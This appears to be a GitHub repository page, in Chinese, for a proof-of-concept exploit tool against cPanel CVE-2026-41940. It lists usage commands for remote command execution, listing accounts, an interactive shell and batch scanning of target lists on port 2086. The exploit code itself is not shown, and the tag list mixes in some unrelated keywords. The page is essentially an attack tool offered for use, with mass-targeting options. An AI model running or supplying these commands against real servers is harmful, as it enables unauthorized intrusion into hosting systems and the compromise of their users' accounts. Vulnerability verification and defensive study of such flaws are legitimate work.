imbas007/POC_CVE-2026-41940
GitHub: imbas007/POC_CVE-2026-41940
针对 cPanel CVE-2026-41940 漏洞的 PoC 利用工具,支持远程命令执行、账户列举和批量扫描报告生成。
Stars: 0 | Forks: 0
# POC_CVE-2026-41940
## 快速开始
```
python3 poc_CVE-2026-41940.py -h
```
## 使用示例
**扫描单个主机**
```
python3 poc_CVE-2026-41940.py -u https://target.example:2086
```
**成功利用链后列出账户**
```
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action list
```
**运行 shell 命令**
```
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action cmd --cmd 'id; whoami; uname -a'
```
**交互式 shell**
```
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action shell
```
**从文件读取目标 + JSON 报告**
```
python3 poc_CVE-2026-41940.py -l targets.txt -t 20 -o results.json
```
参考:[ynsmroztas](https://github.com/ynsmroztas/cPanelSniper)
标签:CISA项目, cPanel, CVE, CVE-2026-41940, Maven, POC, Python, RCE, Web安全, 反弹Shell, 命令执行, 攻击脚本, 数字签名, 数据展示, 无后门, 无服务器架构, 无线安全, 漏洞验证, 红队, 编程工具, 网络安全, 自动化利用, 蓝队分析, 远程代码执行, 隐私保护